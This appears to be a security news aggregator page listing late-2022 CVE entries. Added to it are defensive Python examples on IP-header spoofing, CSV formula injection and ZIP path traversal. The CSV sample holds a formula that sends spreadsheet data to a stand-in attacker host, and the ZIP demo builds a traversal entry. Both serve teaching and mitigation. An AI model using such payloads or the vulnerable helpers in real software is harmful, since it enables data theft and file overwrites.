What's new around the internet

Latest entries

Source | Date (GMT) | Title | Description | Tags / Notes
CVE | 2022-12-12 21:15:10 | CVE-2022-46904 | Insufficient filtering of user input in WebSoft HCM 2021.2.3.327 allows an authenticated attacker to inject arbitrary HTML tags, including JavaScript, into the page rendered by the user's browser, which leads to Self-XSS. | Guideline
CVE | 2022-12-12 21:15:10 | CVE-2022-46906 | Insufficient filtering of user input in WebSoft HCM 2021.2.3.327 allows an authenticated attacker to inject arbitrary HTML tags, including JavaScript, into the page rendered by the user's browser, which leads to Reflected XSS. | Guideline
CVE | 2022-12-12 21:15:10 | CVE-2022-46903 | Insufficient filtering of user input in WebSoft HCM 2021.2.3.327 allows an authenticated attacker to inject arbitrary HTML tags, including JavaScript, into the page rendered by the user's browser, which leads to Stored XSS. | Guideline
CVE | 2022-12-12 21:15:10 | CVE-2022-46905 | Insufficient filtering of user input in WebSoft HCM 2021.2.3.327 allows an unauthenticated attacker to inject arbitrary HTML tags, including JavaScript, into the page rendered by the user's browser, which leads to Reflected XSS. | Guideline
CVE | 2022-12-12 18:15:13 | CVE-2022-4097 | The All-In-One Security (AIOS) WordPress plugin before 5.0.8 is susceptible to IP spoofing, which lets an attacker bypass its IP-based security features (IP blocks, rate limiting, brute-force protection and more). | Guideline
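The AIOS entry above is the classic shape of an IP-spoofing bug: a security feature keys its blocklist or failure counter on an address taken from a client-controllable header such as X-Forwarded-For. The following is an added example written for this page, not code from the AIOS plugin or from WordPress; it assumes a deployment where the application sits behind reverse proxies in 10.0.0.0/8 (a constructed assumption), and it shows a spoofable resolver next to a proxy-aware one, then counts how many of twenty failed logins a per-IP lockout would actually have stopped under each.

```python
"""Client-IP resolution behind a reverse proxy: a spoofable version next to a
proxy-aware one, plus a toy per-IP brute-force counter to show the difference."""
from ipaddress import ip_address, ip_network

# Assumption for this example: the application sits behind reverse proxies in
# 10.0.0.0/8, and only those hosts are allowed to append X-Forwarded-For hops.
TRUSTED_PROXIES = [ip_network("10.0.0.0/8")]


def _is_trusted_proxy(addr: str) -> bool:
    try:
        ip = ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_PROXIES)


def client_ip_naive(headers: dict, remote_addr: str) -> str:
    """Spoofable: trusts the leftmost X-Forwarded-For value from anyone."""
    xff = headers.get("X-Forwarded-For", "")
    if xff.strip():
        return xff.split(",")[0].strip()
    return remote_addr


def client_ip_hardened(headers: dict, remote_addr: str) -> str:
    """Proxy-aware: X-Forwarded-For is consulted only when the TCP peer is a
    trusted proxy, and the chain is walked from the right (the hop our own
    proxy appended) to the first address that is not one of our proxies."""
    if not _is_trusted_proxy(remote_addr):
        return remote_addr                      # direct connection: the header is attacker-controlled
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if _is_trusted_proxy(hop):
            continue                            # skip our own proxies in the chain
        try:
            return str(ip_address(hop))         # also rejects junk such as "1.2.3.4' OR 1=1"
        except ValueError:
            break
    return remote_addr


def simulate_brute_force(resolver, attempts: int = 20, limit: int = 5) -> int:
    """Run `attempts` failed logins from one direct attacker (peer 203.0.113.7,
    not a trusted proxy) who rotates the X-Forwarded-For header on every try.
    Returns how many attempts a per-IP lockout (more than `limit` failures
    from one resolved IP) would have blocked."""
    failures: dict = {}
    blocked = 0
    for i in range(attempts):
        headers = {"X-Forwarded-For": f"192.0.2.{i}"}   # constructed, rotating forgery
        ip = resolver(headers, "203.0.113.7")
        failures[ip] = failures.get(ip, 0) + 1
        if failures[ip] > limit:
            blocked += 1
    return blocked


if __name__ == "__main__":
    print("naive    blocked:", simulate_brute_force(client_ip_naive))     # 0: every attempt looks like a new IP
    print("hardened blocked:", simulate_brute_force(client_ip_hardened))  # 15: all attempts pinned to 203.0.113.7
```

The design point is that the header is only evidence when the TCP peer is a host you operate; walking the chain from the right matters too, because a client connecting through a legitimate proxy can still prepend forged hops on the left. When the application is not behind a proxy at all, the correct resolver is simply the socket peer address.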
CVE | 2022-12-12 18:15:12 | CVE-2022-3981 | The Icegram Express WordPress plugin before 5.5.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by any authenticated user, such as a subscriber. | Guideline
CVE | 2022-12-12 18:15:12 | CVE-2022-3925 | The buddybadges WordPress plugin through 1.0.0 does not sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users. | Guideline
CVE | 2022-12-12 18:15:11 | CVE-2022-3908 | The Helloprint WordPress plugin before 1.4.7 does not sanitise and escape a parameter before outputting it back in the page, leading to Reflected Cross-Site Scripting. | Guideline
CVE | 2022-12-12 18:15:11 | CVE-2022-3921 | [plugin name missing from the source entry] does not validate files uploaded via an AJAX action available to unauthenticated users, which could allow them to upload arbitrary files and lead to RCE. | Guideline
CVE | 2022-12-12 18:15:11 | CVE-2022-3915 | The Dokan WordPress plugin before 3.7.6 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users. | Guideline
CVE | 2022-12-12 18:15:10 | CVE-2022-3359 | The Shortcodes and extra features for Phlox WordPress plugin through 2.10.5 unserialises the content of an imported file, which could lead to PHP object injection when a user imports (intentionally or not) a malicious file and a suitable gadget chain is present on the blog. | Guideline
CVE | 2022-12-12 18:15:10 | CVE-2022-3605 | The WP CSV Exporter WordPress plugin before 1.3.7 does not properly escape fields when exporting data as CSV, leading to CSV injection. | Guideline
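CSV injection, as in the WP CSV Exporter entry above, is not a parsing bug in the exporter but a downstream one: a cell beginning with =, +, - or @ is evaluated as a formula when the file is opened in a spreadsheet, so an attacker who controls any exported string (a display name, a comment) controls what the administrator's spreadsheet executes. The example below is added for this page and is not the plugin's code; the sample rows are constructed. It shows the verbatim writer next to a neutralising one and an audit helper that reports which cells a spreadsheet would still try to evaluate.

```python
"""CSV export: the raw (formula-injectable) writer next to a neutralising one."""
import csv
import io

# Leading characters that make a spreadsheet interpret a cell as a formula
# (tab and CR are included because some importers let them start a new cell/row).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def _looks_numeric(text: str) -> bool:
    """True for values a spreadsheet would read as a number (e.g. "-12"), which
    need no escaping even though they start with a trigger character."""
    try:
        float(text)
        return True
    except ValueError:
        return False


def neutralise_cell(value) -> str:
    """Return a text form of `value` that a spreadsheet will not evaluate: strings
    starting with a trigger character get a leading apostrophe, which Excel and
    LibreOffice treat as 'this cell is text'. Numbers pass through unchanged."""
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return str(value)
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS) and not _looks_numeric(text):
        text = "'" + text
    return text


def export_csv(rows, neutralise: bool = True) -> str:
    """Serialise rows to CSV. `neutralise=False` reproduces the vulnerable
    behaviour: every cell is emitted verbatim."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralise_cell(c) if neutralise else c for c in row])
    return buf.getvalue()


def formula_cells(csv_text: str) -> list:
    """Audit helper: (row, column) positions whose parsed cell still starts with
    a trigger character and is not a plain number, i.e. what a spreadsheet
    would try to evaluate. Quoting alone does not help: the quotes are gone
    after parsing, which is exactly why the exporter must change the content."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.startswith(FORMULA_TRIGGERS) and not _looks_numeric(cell):
                hits.append((r, c))
    return hits


# Constructed sample: user-supplied display names as an attacker could set them.
SAMPLE_ROWS = [
    ("user", "display_name", "balance"),
    ("alice", '=HYPERLINK("https://attacker.example/?"&B2,"open")', 10),
    ("bob", "+1 (555) 0100", -12),
    ("carol", "@carol", 0),
]

if __name__ == "__main__":
    print("raw export flags:", formula_cells(export_csv(SAMPLE_ROWS, neutralise=False)))
    print("neutralised flags:", formula_cells(export_csv(SAMPLE_ROWS)))
```

The apostrophe prefix is the widely used mitigation, but it is lossy (the exported text now differs from the stored value), so exporters that need round-tripping usually document it or offer a tab-separated or XLSX export instead.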
Checkpoint | 2022-12-12 18:02:25 | Check Point CloudGuard AppSec is the only product known to pre-emptively block Claroty WAF bypass | By Oded Gonda, VP Technology and Innovation, Check Point. Claroty Team82 has developed a generic bypass for industry-leading web application firewalls (WAFs). The technique appends JSON syntax to SQL injection payloads that the WAF is unable to parse. It is explained in a detailed blog post published on December 8th, 2022. As… | Guideline ★★
globalsecuritymag | 2022-12-12 14:31:18 | Axis Communications launches private bug bounty program with Bugcrowd | Axis Communications, an approved CVE Numbering Authority (CNA), is launching a private bug bounty program with Bugcrowd, a crowdsourced-security vendor. The program strengthens Axis' commitment to working with external security researchers and ethical hackers, and reinforces the company's efforts to proactively identify, patch and disclose vulnerabilities in AXIS OS, the Linux-based operating system that drives most Axis products. | Product Reviews, Vulnerability, Guideline ★★★
CVE | 2022-12-12 14:15:10 | CVE-2022-4421 | A vulnerability classified as problematic was found in rAthena FluxCP, in an unknown function of the file themes/default/servicedesk/view.php (Service Desk Image URL Handler). Manipulation of the argument sslink leads to cross-site scripting; the attack can be launched remotely. The fix is commit 8a39b2b2bf28353b3503ff1421862393db15aa7e; applying it is recommended. VDB-215304. | Vulnerability, Guideline
CVE | 2022-12-12 14:15:10 | CVE-2021-4244 | A vulnerability classified as problematic was found in the yikes-inc-easy-mailchimp-extender plugin up to 6.8.5, in an unknown part of the file admin/partials/ajax/add_field_to_form.php. Manipulation of the arguments field_name, merge_tag, field_type or list_id leads to cross-site scripting; the attack can be launched remotely. Upgrading to version 6.8.6 (commit 3662c6593aa1bb4286781214891d26de2e947695) addresses this issue. VDB-215307. | Vulnerability, Guideline
CVE | 2022-12-12 14:15:10 | CVE-2021-4243 | A vulnerability rated as problematic was found in claviska jquery-minicolors up to 2.3.5, in unknown functionality of the file jquery.minicolors.js. Manipulation leads to cross-site scripting; the attack can be launched remotely. Upgrading to version 2.3.6 (commit ef134824a7f4110ada53ea6c173111a4fa2f48f3) addresses this issue. VDB-215306. | Vulnerability, Guideline
CVE | 2022-12-12 13:15:15 | CVE-2022-44533 | A vulnerability in the Aruba EdgeConnect Enterprise web management interface allows remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system, leading to complete system compromise. Affected: ECOS 9.2.1.0 and below; ECOS 9.1.3.0 and below; ECOS 9.0.7.0 and below; ECOS 8.3.7.1 and below. | Vulnerability, Guideline
CVE | 2022-12-12 13:15:14 | CVE-2022-3510 | A parsing issue similar to CVE-2022-3171, but with Message-Type Extensions, in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to denial of service. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields cause objects to be converted back and forth between mutable and immutable forms, resulting in potentially long garbage-collection pauses. Updating to the versions listed above is recommended. | Guideline
CVE | 2022-12-12 13:15:14 (43541, 43542) and 13:15:13 (37920 to 37924) | CVE-2022-43541, CVE-2022-43542, CVE-2022-37920, CVE-2022-37921, CVE-2022-37922, CVE-2022-37923, CVE-2022-37924 | Seven separately assigned vulnerabilities in the Aruba EdgeConnect Enterprise command line interface, all published with the same description: remote authenticated users can run arbitrary commands on the underlying host, and a successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system, leading to complete system compromise. Affected: ECOS 9.2.1.0 and below; ECOS 9.1.3.0 and below; ECOS 9.0.7.0 and below; ECOS 8.3.7.1 and below. | Guideline
CVE | 2022-12-12 13:15:14 | CVE-2022-3509 | A parsing issue similar to CVE-2022-3171, but with textformat, in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to denial of service. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields cause objects to be converted back and forth between mutable and immutable forms, resulting in potentially long garbage-collection pauses. Updating to the versions listed above is recommended. | Guideline
CVE | 2022-12-12 13:15:13 | CVE-2022-37909 | Aruba has identified certain configurations of ArubaOS that can lead to disclosure of sensitive information from the configured ESSIDs. The scenarios in which this disclosure can occur are complex and depend on factors beyond the attacker's control. | Guideline
CVE | 2022-12-12 13:15:12 | CVE-2022-37897 | A command injection vulnerability could lead to unauthenticated remote code execution by sending specially crafted packets to the PAPI (Aruba Networks AP management protocol) UDP port 8211. Successful exploitation results in the ability to execute arbitrary code as a privileged user on the underlying operating system. | Vulnerability, Guideline
CVE | 2022-12-12 13:15:12 | CVE-2022-37903 | A vulnerability allows an authenticated attacker to overwrite an arbitrary file with attacker-controlled content via the web interface. Successful exploitation could lead to full compromise of the underlying host operating system. | Vulnerability, Guideline
CVE | 2022-12-12 13:15:11 | CVE-2021-3821 | A potential security vulnerability has been identified in certain HP multifunction printers (MFPs). It may lead to denial of service when running HP Workpath solutions on potentially affected products. | Vulnerability, Guideline
Cybereason | 2022-12-12 11:00:00 | Ransomware: Which Industries Are Most Likely to Pay | A recent Cybereason study, Ransomware: The True Cost to Business 2022, found that 73% of respondents had experienced a ransomware attack in the last 24 months; of those, 28% said their organisation paid the ransom. A separate WSJ Pro Research survey of cybersecurity leaders found that 42.5% of respondents would consider paying a ransom. | Ransomware, Guideline ★★★★
News | 2022-12-12 07:30:13 | IT security teams, business execs still not on same page | Also: Guri the air-gap guru strikes again, while pro-Ukraine hackers set up a proxy network in Russia. In brief: let's start with the good news. According to a survey of security and business leaders, executives have become far more aware of the importance of cyber security in the past two years, better aligning security teams and leadership. … | Guideline ★★
CVE | 2022-12-12 07:15:16 | CVE-2022-4416 | A vulnerability declared as critical was found in RainyGao DocSys, in the function getReposAllUsers of the file /DocSystem/Repos/getReposAllUsers.do. Manipulation of the argument searchWord or reposId leads to SQL injection; the attack can be initiated remotely. The exploit has been disclosed publicly and may be used. VDB-215278. | Vulnerability, Guideline
CVE | 2022-12-11 15:15:09 | CVE-2022-4403 | A vulnerability classified as critical was found in SourceCodester Canteen Management System, in unknown code of the file ajax_represent.php. Manipulation of the argument customer_id leads to SQL injection; the attack can be initiated remotely. The exploit has been disclosed publicly and may be used. VDB-215272. | Vulnerability, Guideline
CVE | 2022-12-11 08:15:09 | CVE-2022-4400 | A vulnerability classified as problematic was found in zbl1996 FS-Blog, in unknown processing of the Title Handler component. Manipulation leads to cross-site scripting; the attack may be initiated remotely. VDB-215267. | Vulnerability, Guideline
CVE | 2022-12-11 08:15:09 | CVE-2022-4402 | A vulnerability classified as critical was found in RainyGao DocSys 2.02.37, in an unknown part of the ZIP File Decompression Handler component. Manipulation leads to path traversal ('../filedir'); the attack can be initiated remotely. The exploit has been disclosed publicly and may be used. VDB-215271. | Vulnerability, Guideline
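The DocSys entry above is an archive-extraction traversal ("zip slip"): an entry named ../filedir is joined onto the extraction directory and written wherever the relative path lands. The example below is added for this page and is not DocSys code (DocSys is a Java application; the pattern is shown in Python because the same bug is language-independent). Both archives are constructed in memory. The vulnerable extractor joins the entry name straight onto the destination; the hardened one resolves every name against the destination root and refuses the whole archive before writing a single file, so a rejected archive leaves no half-extracted state behind.

```python
"""ZIP extraction: a hand-rolled extractor that joins entry names straight onto
the destination (the traversal pattern) next to one that validates every
entry before writing anything."""
import io
import os
import shutil
import tempfile
import zipfile
from pathlib import Path


def build_zip(entries: dict) -> bytes:
    """Build an in-memory archive; zipfile happily writes names like '../x'."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed samples for this example.
BENIGN_ZIP = build_zip({"docs/readme.txt": b"hello"})
MALICIOUS_ZIP = build_zip({"docs/readme.txt": b"hello", "../evil.txt": b"pwned"})


def unsafe_extract(zip_bytes: bytes, dest: str) -> None:
    """Vulnerable: '../evil.txt' becomes <dest>/../evil.txt and escapes dest."""
    os.makedirs(dest, exist_ok=True)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest, info.filename)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))


def safe_extract(zip_bytes: bytes, dest: str) -> list:
    """Validate every entry name first, then extract. Returns the relative paths
    written. Raises ValueError before touching the filesystem if any entry is
    absolute, uses backslashes, or resolves outside dest via '..' components."""
    root = Path(dest).resolve()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        planned = []
        for info in zf.infolist():
            name = info.filename
            if not name or name.startswith(("/", "\\")) or "\\" in name or os.path.isabs(name):
                raise ValueError(f"rejected entry name {name!r}")
            target = (root / name).resolve()      # normalises '..' lexically and via symlinks
            try:
                rel = target.relative_to(root)
            except ValueError:
                raise ValueError(f"path traversal rejected: {name!r}") from None
            if target == root:
                raise ValueError(f"entry {name!r} is the extraction root itself")
            planned.append((info, target, rel))
        # Second pass: nothing is written until every entry has passed.
        written = []
        for info, target, rel in planned:
            if info.is_dir():
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(zf.read(info))
            written.append(rel.as_posix())
    return written


def demonstrate() -> dict:
    """Run both extractors under a fresh temporary root and report what happened."""
    root = tempfile.mkdtemp()
    try:
        result = {"safe_benign": safe_extract(BENIGN_ZIP, os.path.join(root, "a"))}
        try:
            safe_extract(MALICIOUS_ZIP, os.path.join(root, "b"))
            result["safe_rejected_malicious"] = False
        except ValueError:
            result["safe_rejected_malicious"] = True
        result["safe_wrote_nothing"] = not os.path.exists(os.path.join(root, "b", "docs"))
        result["safe_escaped"] = os.path.exists(os.path.join(root, "evil.txt"))
        unsafe_extract(MALICIOUS_ZIP, os.path.join(root, "c"))
        result["unsafe_escaped"] = os.path.exists(os.path.join(root, "evil.txt"))  # landed in <root>, not <root>/c
    finally:
        shutil.rmtree(root, ignore_errors=True)
    return result


if __name__ == "__main__":
    for key, value in demonstrate().items():
        print(f"{key}: {value}")
```

Python's own ZipFile.extract() and extractall() already strip leading separators and '..' components, so the bug usually appears, as here, in code that reads entries itself and builds the output path by string joining; in Java the equivalent check is comparing the canonical path of the target against the canonical path of the destination directory before opening the output stream.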
CVE | 2022-12-11 08:15:09 | CVE-2022-4401 | A vulnerability classified as problematic was found in pallidlight online-course-selection-system, in an unknown function. Manipulation leads to cross-site scripting; the attack can be launched remotely. VDB-215268. | Vulnerability, Guideline
CVE | 2022-12-10 22:15:17 | CVE-2022-4399 | A vulnerability rated as critical was found in TicklishHoneyBee nodau, in unknown functionality of the file src/db.c. Manipulation of the argument value or name leads to SQL injection. The fix is commit 7a7d737a3929f335b9717ddbd31db91151b69ad2; applying it is recommended. VDB-215252. | Vulnerability, Guideline
CVE | 2022-12-10 19:15:10 | CVE-2022-4397 | A vulnerability classified as problematic was found in morontt zend-blog-number-2, in an unknown function of the file application/forms/Comment.php (Comment Handler). Manipulation leads to cross-site request forgery; the attack can be launched remotely. The fix is commit 36b2d4abe20a6245e4f8df7a4b14e130b24d429d; applying it is recommended. VDB-215250. | Vulnerability, Guideline
CVE | 2022-12-10 12:15:10 | CVE-2022-4396 | ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as problematic was found in RDFlib pyrdfa3, in the function _get_option of the file pyRdfa/__init__.py. Manipulation leads to cross-site scripting; the attack may be initiated remotely. The fix is commit ffd1d62dd50d5f4190013b39cedcdfbd81f3ce3e; applying it is recommended. VDB-215249. NOTE: this vulnerability only affects products that are no longer supported by the maintainer. | Vulnerability, Guideline
CVE | 2022-12-09 19:15:13 | CVE-2022-41299 | IBM Cloud Transformation Advisor 2.0.1 through 3.3.1 is vulnerable to cross-site scripting: users can embed arbitrary JavaScript in the Web UI, altering the intended functionality and potentially leading to credential disclosure within a trusted session. IBM X-Force ID: 237214. | Vulnerability, Guideline
Cisco | 2022-12-09 13:00:31 | Preparing for 2023 and what lies in store for Endpoint Security | Cisco surveyed 100 IT and security leaders on the Gartner Peer Insights platform to understand their security posture and their view of the future of endpoint security. | Guideline ★★★
CVE | 2022-12-09 08:15:10 | CVE-2022-4377 | A vulnerability declared as problematic was found in S-CMS 5.0 Build 20220328, in unknown functionality of the Contact Information Page component. Manipulation of the argument "Make a Call" leads to cross-site scripting; the attack can be launched remotely. The exploit has been disclosed publicly and may be used. VDB-215197. | Vulnerability, Guideline
CVE | 2022-12-09 08:15:09 | CVE-2022-4375 | A vulnerability classified as critical was found in Mingsoft MCMS up to 5.2.9, in an unknown function of the file /cms/category/list. Manipulation of the argument sqlWhere leads to SQL injection; the attack can be launched remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 5.2.10 addresses this issue. VDB-215196. | Vulnerability, Guideline
CVE | 2022-12-08 18:15:10 | CVE-2022-46827 | In JetBrains IntelliJ IDEA before 2022.3, an XXE attack leading to SSRF via requests to custom plugin repositories was possible. | Guideline
globalsecuritymag | 2022-12-08 18:11:26 | Salt Security API Protection Platform Wins Gold in 2022 Best in Biz Awards | Salt Security's API protection platform received first place in the "Enterprise Product of the Year – Security Software" category. | Business News, Guideline ★★
CVE | 2022-12-08 15:15:10 | CVE-2022-4364 | A vulnerability classified as critical was found in Teledyne FLIR AX8 up to 1.46.16, in an unknown function of the file palette.php (Web Service Handler). Manipulation of the argument palette leads to command injection; the attack can be launched remotely. The exploit has been disclosed publicly and may be used. VDB-215118. | Vulnerability, Guideline
globalsecuritymag | 2022-12-08 15:03:31 | Checkmarx Fortifies Executive Team with Appointment of Amit Daniel as Global Chief Marketing Officer | Amit Daniel, a 20-year technology and cybersecurity industry veteran, will drive global marketing and growth strategies for the application security platform provider. | Business News, Guideline ★★
InfoSecurityMag | 2022-12-08 13:30:00 | #BHEU: Time for Cyber Pros to Shape the Industry's Future | Jen Ellis urged the cyber industry to take a leading role in shaping its future during Black Hat Europe 2022. | Guideline ★★
Last update at: 2024-07-02 18:07:36